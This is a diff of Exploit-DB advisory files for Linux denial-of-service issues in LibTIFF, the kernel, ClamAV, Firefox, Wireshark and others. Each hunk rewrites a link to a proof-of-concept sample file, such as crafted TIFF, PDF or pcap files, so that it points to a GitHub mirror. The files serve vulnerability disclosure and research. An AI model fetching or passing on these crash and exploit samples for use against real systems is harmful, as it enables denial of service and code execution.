@@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities.
 
 An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library.
 
-http://www.exploit-db.com/sploits/27762-1.tiff.0
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-1.tiff.0
 
-http://www.exploit-db.com/sploits/27762-2.tiff.1
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-2.tiff.1
 
-http://www.exploit-db.com/sploits/27762-3.tiff.100
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-3.tiff.100

platforms/linux/dos/27764.txt

@@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab
 
 An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions.
 
-http://www.exploit-db.com/sploits/27764.tiff.11
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27764.tiff.11

platforms/linux/dos/27765.txt

@@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability;
 
 Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible.
 
-http://www.exploit-db.com/sploits/27765.tiff.2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27765.tiff.2

platforms/linux/dos/27925.txt

@@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s
 
 This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected.
 
-http://www.exploit-db.com/sploits/27925.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27925.tgz

platforms/linux/dos/28348.txt

@@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t
 
 ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected.
 
-http://www.exploit-db.com/sploits/28348.exe
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28348.exe

platforms/linux/dos/28358.txt

@@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe
 
 Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected.
 
-http://www.exploit-db.com/sploits/28358.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28358.tar.gz

platforms/linux/dos/28367.txt

@@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
 
 AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected.
 
-http://www.exploit-db.com/sploits/28367.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28367.zip

platforms/linux/dos/28380.txt

@@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the
 
 Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected.
 
-http://www.exploit-db.com/sploits/28380.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28380.zip

platforms/linux/dos/28383.txt

@@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of
 
 ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue.
 
-http://www.exploit-db.com/sploits/28383.sgi
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28383.sgi

platforms/linux/dos/28384.txt

@@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex
 
 Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected.
 
-http://www.exploit-db.com/sploits/28384.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28384.zip

platforms/linux/dos/28895.txt

@@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability.
 
 An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
 
-http://www.exploit-db.com/sploits/28895.img.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28895.img.gz

platforms/linux/dos/28912.txt

@@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue
 
 An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
 
-http://www.exploit-db.com/sploits/28912.iso.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28912.iso.bz2

platforms/linux/dos/29399.txt

@@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie
 
 An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service.
 
-http://www.exploit-db.com/sploits/29399.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29399.pdf

platforms/linux/dos/29520.txt

@@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab
 
 An attacker can exploit this issue to crash applications on a victim's computer. 
 
-http://www.exploit-db.com/sploits/29520.mbox
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29520.mbox

platforms/linux/dos/29723.txt

@@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected.
 
 GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image.
 
-http://www.exploit-db.com/sploits/29723.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29723.zip

platforms/linux/dos/29809.txt

@@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour
 
 PulseAudio 0.9.5 is vulnerable to this issue. 
 
-http://www.exploit-db.com/sploits/29809.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29809.zip

platforms/linux/dos/30024.txt

@@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi
 
 Versions of libexif prior to 0.6.14 are vulnerable to this issue. 
 
-http://www.exploit-db.com/sploits/30024.jpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30024.jpg

platforms/linux/dos/30648.txt

@@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the
 
 This issue affects versions prior to AlsaPlayer 0.99.80-rc3. 
 
-http://www.exploit-db.com/sploits/30648.ogg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg

platforms/linux/dos/30776.txt

@@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o
 
 LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. 
 
-http://www.exploit-db.com/sploits/30776.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30776.zip

platforms/linux/dos/30837.txt

@@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th
 
 QEMU 0.9.0 is vulnerable; other versions may also be affected.
 
-http://www.exploit-db.com/sploits/30837.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30837.rar

platforms/linux/dos/30894.txt

@@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary
 
 These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
 
-http://www.exploit-db.com/sploits/30894.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30894.zip

platforms/linux/dos/31018.txt

@@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le
 
 These issues affect GStreamer 0.10.15; other versions may also be vulnerable. 
 
-http://www.exploit-db.com/sploits/31018-1.mpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-1.mpg
-http://www.exploit-db.com/sploits/31018-2.mpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-2.mpg
-http://www.exploit-db.com/sploits/31018-3.m2v
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-3.m2v
-http://www.exploit-db.com/sploits/31018-4.m2v
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-4.m2v

platforms/linux/dos/31054.txt

@@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an
 
 Versions prior to SDL_image 1.2.7 are vulnerable. 
 
-http://www.exploit-db.com/sploits/31054.gif
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31054.gif

platforms/linux/dos/31218.txt

@@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected
 
 This issue affects freeSSHd 1.2.0 and prior versions.
 
-http://www.exploit-db.com/sploits/31218.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31218.zip

platforms/linux/dos/31552.txt

@@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
 
 These issues affect Wireshark 0.99.2 up to and including 0.99.8. 
 
-http://www.exploit-db.com/sploits/31552.pcap
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31552.pcap

platforms/linux/dos/31553.txt

@@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
  
 These issues affect Wireshark 0.99.2 up to and including 0.99.8. 
 
-http://www.exploit-db.com/sploits/31553.pcap
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31553.pcap

platforms/linux/dos/31554.txt

@@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
   
 These issues affect Wireshark 0.99.2 up to and including 0.99.8.
  
-http://www.exploit-db.com/sploits/31554.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31554.gz

platforms/linux/dos/31984.txt

@@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting
 
 This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. 
 
-http://www.exploit-db.com/sploits/31984.jpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31984.jpg

platforms/linux/dos/32018.txt

@@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images.
 
 According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. 
 
-http://www.exploit-db.com/sploits/32018.svg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32018.svg

platforms/linux/dos/32019.txt

@@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio
 
 Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. 
 
-http://www.exploit-db.com/sploits/32019.iki
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32019.iki

platforms/linux/dos/32452.txt

@@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.
 
 UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. 
 
-http://www.exploit-db.com/sploits/32452.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32452.zip

platforms/linux/dos/32740.txt

@@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg
 
 QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. 
 
-http://www.exploit-db.com/sploits/32740.bin
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32740.bin

platforms/linux/dos/32775.txt

@@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t
 
 This issue affects versions prior to Linux kernel 2.6.27.14.
 
-http://www.exploit-db.com/sploits/32775.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32775.gz

platforms/linux/dos/32800.txt

@@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications
 
 These issues affect versions prior to Poppler 0.10.4.
 
-http://www.exploit-db.com/sploits/32800.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32800.pdf

platforms/linux/dos/32856.txt

@@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
 
 Successfully exploiting this issue allows remote attackers to deny service to legitimate users. 
 
-http://www.exploit-db.com/sploits/32856.aac
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32856.aac

platforms/linux/dos/32857.txt

@@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
  
 Successfully exploiting this issue allows remote attackers to deny service to legitimate users. 
 
-http://www.exploit-db.com/sploits/32857.ogm
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32857.ogm

platforms/linux/dos/33017.txt

@@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected.
 
 NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. 
 
-http://www.exploit-db.com/sploits/33017.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33017.pdf

platforms/linux/dos/33049.txt

@@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co
 
 LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. 
 
-http://www.exploit-db.com/sploits/33049.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33049.zip